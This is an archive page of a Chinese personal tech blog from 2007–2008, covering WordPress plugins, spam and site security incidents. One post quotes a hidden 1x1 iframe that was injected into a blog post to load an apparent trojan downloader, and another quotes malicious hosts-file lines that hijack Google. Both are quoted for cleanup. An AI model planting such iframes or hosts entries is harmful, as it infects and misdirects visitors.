Archive for the '技' Category

Spamer来做广告了

Published
by
Jerry
on 2008年02月22日
in
. Comments

spam tool
这是今天收到的一条SPAM,本身居然就是SPAM TOOL的广告,功能强大,款式新颖,
来看看主要技术指标:

# Software is able to work with lots of different types of forums and guestbooks: phpBB and PHP-Nuke with any modifications, yaBB, VBulletin, Invision Power Board, IconBoard, UltimateBB, exBB, phorum.org, wiki, different types of bulletin boards and even custom-written code.

# Attention: unique feature – software works around EVERY possible type of protection from automatic registration, including:
- Pictocode protection (tickets, captcha), which look something like: "Enter the number you see in the box".
- E-mail activation protection.
- Java-script protection.

能作用于国际流行的各种论坛,维基,留言本,公告板,甚至是自己写的代码。
还有特色功能:能跳过各种各样的防ROBOT机制达成自动注册帐号(发现注册用户变多了不一定是好事),包括验证码、EMAIL激活、Javascript保护等等。

看后不禁感慨现在科技日新月异,在SPAM/ANTI-SPAM领域更是道高一尺魔高一丈啊!
现在的过滤SPAM比较有效的有几方式:在收到留言时与SPAM数据库中的数据进行对比,关键字过滤,注册用户方能回复,验证码,问问题。
SPAMER不负责任随意用新ID发SPAM的态度注定第一种方法的效率会随着时间增长而越来越低,如果把时间上比较早的那些数据删掉,又不能保证这些ID以后不会继续污染花花草草。
关键字过滤效率很高,但在排除率上实在没有保证。
注册用户方能回复,严重打击游客积极性,尤其对于小网站而言。
验证码和问问题比上面的稍好一些,但也可能使人丧失兴趣。而且现在已经很容易被破解了。

当然还有发现SPAMER后的惩治方法,如BAN IP,但已是亡羊补牢。
如果从互联网的宏观角度不能限制Spam的四处投递的话,现在我觉得比较有效的方法就是限制回复中的url数,能够阻止绝大多数的广告型Spam。

有前景的方向,应该是验证码和开发一种握手机制吧……

Youtube的恐怖统计数据

Published
by
Jerry
on 2008年02月05日
in PHP and
. Comments

(引用自GSeeker)

1.YouTube上面一共有超过600万个视频,并且每个月增长20%;
2.YouTube上面所有的视频所占的容量大概是45TB(1TB=1024GB);
3.自从YouTube上线以来,上面的视频被观看的时间总计大概为9305年;
4.YouTube每个月花在视频带宽上的费用高达数百万美元;
5.YouTube上面最热门的视频的标题一般包含"love"、"music"或"girl";

虽然我们的系统暂时不会这样子,但想想怎么解决这些问题也是很有意思的……(当然第5个不算问题- -#)

Wordpress=>2.3.3

Published
by
Jerry
on 2008年02月05日
in wordpress and
. Comment

wordpress升到了2.3.3,关于更新的内容Wordpress说

WordPress 2.3.3 is an urgent security release. A flaw was found in our XML-RPC implementation such that a specially crafted request would allow any valid user to edit posts of any other user on that blog. In addition to fixing this security flaw, 2.3.3 fixes a few minor bugs. If you are interested only in the security fix, download the fixed version of xmlrpc.php and copy it over your existing xmlrpc.php. Otherwise, you can get the entire release here.

这个XML-RPC的缺陷可以让任何用户修改BLOG文章的内容……也许这就可以解释前段时间出现的被注入的问题

最近尝试用jQuery+k2 template来限制越来越多的SPAM,有点效果。还好现在的SPAM全是comment型的,trackback型的只遇到过一次,前者还可以用禁止评论里有链接的方法来阻止,而后者就只能对某篇日志完全禁止Ping了……

计算x的n次方

Published
by
Jerry
on 2007年11月28日
in
. Comments

实在不想发技术文章的,就简略点吧
想了一晚上加一上午,最后得出的程序
计算x的n次方,两者都为long类型(>=int表示的最大长度)
计算2的65535次方在5秒以内(当然跟机器有关……)
Download(380 times)

成功让小黄花挂到自己的blog

Published
by
Jerry
on 2007年11月12日
in wordpress and
. Comments


乱逛中发现了这个新加坡人做的网站,
功能是根据rss得到某网站的更新再发送邮件到某个邮箱去。
嗯,这下可以把MSN的小黄花挂过来了。

1.去自己的space->选项->电子邮件发布
2.启用电子邮件发布,发件人填写rssfwd@rssfwd.com,机密字自己填写(例XXX),保存,去页面上第5步的地方把那个接收邮箱记下
3.去http://www.rssfwd.com,第一步填写自己blog的rss,可以为挂在feedburner上的,也可以为像我这样的:http://www.JerryHong.com/feed/
4.第二步把刚才记下的接收邮箱填进去
5.rssfwd应该会发一封确认信到你的blog去,去点一下就好了

这样子大家看小黄花就知道我的blog有没有更新了(当然前提是加了我的MSN- -b)。
定时刷新,延迟是难免的。
问题也有,space上的文章里信息太多,可能会被别人轻易地un-subscribe,可能在rssfwd上有设置吧。

PS:基于RSS的工具实在是丰富又好玩。不过……没难度……
怎么就没人做个plugin让人在写tags的时候可以看到已经有的tags啊!!!

试验让BLOG更新挂到校内上去,不过这个看来需要自己写程序了

关于卡巴6报本站有马的问题……

Published
by
Jerry
on 2007年11月04日
in wordpress
. Comments

Wordpress有可能有还未解决的重大漏洞……
米米水和得失跟我说我的网站上有木马Trojan-Downloader.JS.Psyme.cz,开始时不在意,因为有人显示连www.baidu.com/[6]都有马……
然后查了下JS.Psyme,发现它有可能放在一个隐藏的IFrame里混入页面,有点紧张,在我首页的源代码里查找了一下,居然还真的在一篇文章里找到了这段代码:

  1. <!-- Traffic Statistics -->
  2. <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
  3. <!-- End Traffic Statistics -->

嵌入的这个页面从文件名看很像是wp-stats插件使用的程序,但实际上完全不是。把它用IE和FIREFOX来看代码是不一样的,很明显会针对IE进行攻击。而61.132.75.71是哪里呢?江苏南京,这个域名的首页只显示一个字符串test,显然不怀好意。
不过这样一来目标就明显多了,搜索后发现有不少人也被注入,比如Xingsu
接下来在Wordpress官方浩大的问题库里找到这个帖子:iframe injection problem?,在Trac里则有这个:iframe being injected。由于所有人的iframe都是被加在了post里而非theme里,所以应该不会是theme exploit,那么就有可能是包括Wordpress 2.3.1都没有解决的一个漏洞导致了这种注入。具体在哪有漏洞可能只有拥有61.132.75.71这个IP的人才清楚。

眼下的解决方法只有在文章里搜索所有的隐藏IFrame然后删掉,至于更新前会不会再次被注入谁也不知道。反正备份看来是必须做的了。
感谢关心多多居的各位朋友,顺便BS一下我那个过分安静的卡巴6……

wordpress.com.cn

Published
by
Jerry
on 2007年09月14日
in wordpress and
. Comment

今天才看到这个使用Wordpress而且能够从大陆正常访问的BSP,但是……它居然已经成立两年了。
两年了,很可惜用户并不多。我半个小时前建的站居然现在还高居更新榜首位。都说现在开放了开放了,其实国内对国外的了解还是太少,更何况Wordpress的财力不是那些做出的博客千篇一律但一天到晚用名人效应拉用户的BSP能比的啊。
自己有网站了,当然不会把那个作为主要的。占个位而已。更何况在当前的历史环境下,BSP都太危险,不知哪天连新浪博客都会连接不上(除非主席去开博,嘿嘿)
不过还有更好玩的用途。那就是里面含的500个模板……在Omi的帮助下我筛我筛我筛筛筛最后的胜利者大家可以自己去看……
要开学了,人也多了,开心。

Wordpress Plugin: SimplePageNavi v1.0 release by Jerry

Published
by
Jerry
on 2007年08月19日
in PHP, wordpress and
. Comments

改变WORDPRESS原本换页方法的插件,效果为显示页码列表而非“上一页 下一页”
安装:不解释
使用:见E文

Change the page navigation way.
Installation: unzip & enable
Usage: open your template, find index.php
search for navigation part like this:

  1. <div class="alignleft"><?php next_posts_link('&laquo; 较旧文章') ?></div>
  2.             <div class="alignright"><?php previous_posts_link('较新文章 &raquo;') ?></div>

Replace it with this:

  1. <?php 
  2.             if(function_exists('SimplePageNavi') )
  3.                 SimplePageNavi();
  4.             else
  5.             {
  6.             ?>
  7.             <div class="alignleft"><?php next_posts_link('&laquo; 较旧文章') ?></div>
  8.             <div class="alignright"><?php previous_posts_link('较新文章 &raquo;') ?></div>
  9.             <?php
  10.             }
  11.             ?>

Quite easy, huh?
Download(333 times)

Wordpress Plugin: Download Counter v1.1 Released by Jerry 下载计数器

Published
by
Jerry
on 2007年08月19日
in PHP, wordpress and
. Comments

简单介绍下吧,此Plugin是基于VanguardDownload Counter v1.0来写的,作用是统计附件的下载次数,并让下载者看到此文件已被载过多少次(DISCUZ!的下载次数总看过吧)
安装过程就不解释了,下面E文里有,还是老样子,有问题请留言或发至hjrgenius (a) 163.com,欢迎讨论:)
这是第三个WP插件了,写完以后对WordPress的敬仰有如滔滔江水连绵不绝又如黄河泛滥一发不可收拾。用Wordpress的架构来只是做BLOG实在是可惜可惜!

Hello everyone, this is the third plugin that I've developed/hacked/enhanced/etc... and I'm supposed to use english to descript it this time:)
Download:
Download(407 times)
Description:
The download counter plugin helps you Count the times a file has been downloaded as well as some misc statistics. It also let downloaders know how many times the file has been downloaded by others.

I enhanced it based on Vanguard's Download Counter v1.0.

Installation:
Unzip the contents of the .zip file. Upload the folder 'DownloadCounter' to: WordPress_directory/wp-content/plugins
Make sure that, inside your plugin folder, there're 3 files: download.php, DownloadCounter.php and functions.inc.php
Go to your administration panel and activate this plugin.

Usage:
The plugin is now installed, all you have to do now is

  • 1.upload files via ftp or else.
  • 2.add files using this plugin's Administration panel.No special code is needed to be placed in any of your theme files. This plugin automatically generates a simple HTML code to use in your files.
  • 3.When you create/edit a post, there will be a button in the panel to let you add tags in the post. All you have to know is the id of the file(which can be got in administration panel of downloadcounter).
  • Then when the post is viewed, the tags will be automatically replaced with download link with the count of downloads.

    • If you have any problems, please leave a comment here or mail to hjrgenius (a) 163.com. Discussion is welcomed.
    Good luck!

    关于"Google已经退出中国,请用百度搜索。"恶意劫持问题的解决方法

    Published
    by
    Jerry
    on 2007年08月16日
    in
    . Comments

    "Google已经退出中国,请用百度搜索。"?恶意劫持!
    最近有人在输入www.google.com 或 www.google.cn后,其网页会导入一个完全错误的页面。上面写着:"Google已经退出中国,请用百度搜索。"
    这其实是某些病毒或恶意软件在破坏用户的计算机系统设置,被劫持的可以是任何域名。解决方法很简单,可以按顺序执行如下步骤来清除病毒:
    1) 打开记事本 Notepad (开始 -> 所有程序 -> 附件 -> 记事本)。
    2)在菜单中选择 文件 -> 打开。
    3) 对于Win/NT/2000/XP/Vista用户,在"文件名"后的输入框中输入:%windir%\system32\drivers\etc\hosts,并点击"打开"或按回车键。对于Win95/98/ME用户,在"文件名"后的输入框中输入:%windir%\hosts,并点击"打开"或按回车键。
    4)在文件中找到含有"google"的行并删去。
    例如,对于大多数被感染用户,该文件中应包含如下四行:
    60.190.203.135 www.google.com
    60.190.203.135 google.com
    60.190.203.135 www.google.cn
    60.190.203.135 google.cn
    5)在菜单中选择 文件->保存,并关闭记事本。

    这个站点的一堆js可以作隐藏源码的范本,啥途径都用上了。